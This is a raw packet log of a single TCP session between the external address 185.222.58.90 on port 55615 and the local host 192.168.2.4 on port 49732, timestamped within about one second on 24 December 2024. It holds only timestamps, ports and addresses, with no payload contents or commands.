Dec 24, 2024 09:07:21.302491903 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.302544117 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.302545071 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.302593946 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.302648067 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.302701950 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.302725077 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.302817106 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.303093910 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.303262949 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.303389072 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.303440094 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.303491116 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.303534985 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.303549051 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.303591013 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.303636074 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.303698063 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.303855896 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.303904057 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.303930044 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.303944111 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.303953886 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.304003954 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.304011106 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.304054976 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.304059029 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.304086924 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.304115057 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.304135084 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.304153919 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.304294109 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.304344893 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.304359913 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.304389000 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.304409981 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.304435015 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.304478884 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.304529905 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.304620028 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.304655075 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.304687977 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.304706097 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.304730892 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.304769039 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.304797888 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.304820061 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.304836988 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.304852009 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.304878950 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.304910898 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.304930925 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.304950953 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.304963112 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.305006981 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.305022955 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.305051088 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.305073023 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.305098057 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.305125952 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.305146933 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.305162907 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.305174112 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.305202007 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.305248976 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.305250883 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.305278063 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.305296898 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.305322886 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.305324078 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.305351973 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.305377007 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.305398941 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.305399895 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.305430889 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.305449963 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.305464029 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.305471897 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.305512905 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.305514097 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.305546999 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.305566072 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.305589914 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.305615902 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.305660963 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.305665970 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.305706024 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.305715084 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.305768013 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.305819035 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.305845976 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.305870056 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.305892944 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.305906057 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.305934906 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.305979967 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.305984020 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.306011915 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.306034088 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.306061983 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.306071997 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.306101084 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.306133032 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.306149960 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.306181908 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.306199074 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.306246996 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.306273937 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.306297064 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.306308031 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.306334019 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.306349993 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.306355953 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.306396961 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.306404114 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.306432009 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.306448936 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.306472063 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.306498051 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.306529045 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.306551933 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.306567907 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.306612968 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.306644917 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.306688070 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.306704998 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.306750059 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.306754112 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.306792974 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.306798935 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.306827068 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.306847095 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.306874990 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.306888103 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.306915998 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.306956053 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.306963921 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.306974888 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.306993008 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.307003021 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.307020903 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.307068110 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.307071924 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.307096004 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.307117939 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.307123899 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.307137012 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.307154894 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.307178974 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.307183981 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.307207108 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.307230949 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.307231903 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.307260990 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.307287931 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.307307959 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.307333946 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.307343960 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.307379961 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.307389975 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.307419062 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.307446957 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.307470083 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.307475090 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.307497978 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.307514906 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.307531118 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.307560921 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.307580948 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.307602882 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.307610989 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.307640076 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.307661057 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.307683945 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.307687998 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.307715893 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.307744026 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.307766914 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.307787895 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.307811975 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.307840109 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.307862997 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.307867050 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.307892084 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.307903051 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.307914019 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.307930946 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.307950020 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.307959080 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.307985067 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.308007002 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.308026075 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.308033943 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.308073997 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.308084011 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.308103085 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.308126926 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.308130026 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.308149099 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.308176041 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.308180094 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.308207989 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.308228970 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.308248043 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.308252096 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.308275938 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.308291912 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.308326006 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.308353901 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.308377028 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.308382988 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.308391094 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.308410883 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.308440924 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.308449984 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.308459997 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.308487892 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.308536053 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.308537960 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.308564901 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.308593035 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.308598995 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.308623075 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.308633089 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.308640957 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.308669090 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.308689117 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.308700085 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.308716059 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.308727980 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.308743954 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.308770895 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.308794975 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.308825016 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.308844090 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.308854103 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.308876991 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.308897018 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.308901072 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.308947086 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.344850063 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.344916105 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.344964027 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.345016956 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.420691013 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.420723915 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.420754910 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.420758009 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.420773983 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.420808077 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.420816898 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.420850992 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.421376944 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.421432018 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.421498060 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.421530962 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.421564102 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.421590090 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.421667099 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.421720028 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.421777964 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.421808004 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.421829939 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.421849012 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.421917915 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.421966076 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.422157049 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.422185898 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.422223091 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.422235966 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.422250986 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.422275066 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.422292948 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.422298908 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.422327995 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.422346115 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.422370911 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.422375917 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.422404051 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.422447920 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.422451973 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.422494888 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.422527075 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.422528028 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.422552109 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.422564030 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.422744989 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.422799110 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.422904015 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.422931910 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.422971010 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.423003912 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.423122883 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.423151016 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.423171043 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.423182964 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.423202991 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.423221111 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.423233032 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.423293114 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.423301935 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.423352003 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.423372030 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.423402071 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.423454046 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.423557997 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.423604965 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.423697948 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.423727036 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.423755884 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.423780918 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.423783064 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.423810959 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.423846006 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.423871994 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.423921108 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.423969984 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.424012899 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.424058914 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.424061060 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.424088955 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.424112082 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.424134970 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.424138069 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.424165964 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.424192905 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.424210072 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.424231052 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.424259901 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.424277067 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.424326897 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.425113916 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.425175905 CET	49732	55615	192.168.2.4	185.222.58.90
